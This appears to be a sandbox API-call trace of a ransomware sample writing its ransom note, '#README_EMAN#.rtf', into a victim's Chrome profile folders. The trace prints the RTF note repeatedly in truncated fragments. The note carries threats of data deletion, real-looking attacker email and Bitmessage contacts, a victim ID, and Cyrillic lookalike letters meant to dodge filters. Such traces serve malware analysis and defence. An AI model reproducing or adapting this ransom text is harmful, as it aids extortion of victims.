\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.684] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.684] CloseHandle (hObject=0x27c) returned 1 [0301.684] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\#readme_eman#.rtf")) returned 0x20 [0301.685] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\#readme_eman#.rtf")) returned 0x20 [0301.685] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\index-dir\\#readme_eman#.rtf")) returned 0xffffffff [0301.685] GetLastError () returned 0x2 [0301.685] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\index-dir\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure 